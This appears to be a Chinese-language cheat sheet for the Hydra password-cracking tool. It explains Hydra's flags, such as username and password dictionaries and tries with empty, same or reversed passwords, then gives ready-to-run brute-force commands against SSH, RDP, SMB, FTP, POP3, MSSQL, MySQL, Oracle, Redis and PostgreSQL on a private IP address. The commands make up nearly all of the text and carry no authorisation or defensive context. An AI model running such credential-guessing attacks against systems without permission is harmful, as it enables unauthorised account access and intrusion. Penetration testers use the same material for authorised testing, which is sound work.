参数:
-l 指定用户名
-p 指定密码
-L 指定用户名字典
-P 指定密码字典
-C 指定所用格式为“user:password”的字典文件
-e
n null,表示尝试空密码
s same,把用户名本身当做密码进行尝试
r 反向,把用户名倒叙,当做密码进行尝试。
-vV 显示执行细节
-o 保存执行结果
-s 指定非默认端口
-M 指定破解的目标文件,如果不是默认端口,后面跟上“:port”
-t 指定爆破时的任务数量(默认16)
爆破ssh:
用 -l 参数指定用户名,-p参数指定密码,后面直接跟目标的IP地址和协议。
hydra -l root -p 12345678 192.168.31.173 ssh
也可以使用:
♾️ abap 代码:hydra -l root -p 12345678 ssh://192.168.31.173
执行的结果都一样。
Hydra爆破常见服务
远程桌面(RDP)
♾️ abap 代码:hydra -l administrator -P 密码字典 192.168.31.173 rdp
共享文件(SMB)
♾️ abap 代码:hydra -l administrator -P 密码字典 192.168.31.173 smb
文件传输(FTP)
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 ftp
邮箱协议(POP3)
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 pop3
MSSQL数据库
♾️ abap 代码:hydra -l sa -P 密码字典 192.168.31.173 mssql
MySQL数据库
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 mysql
Oracle数据库
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 oracle
Redis数据库
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 redis
PgSQL数据库
♾️ abap 代码:hydra -l 用户名 -P 密码字典 192.168.31.173 postgresql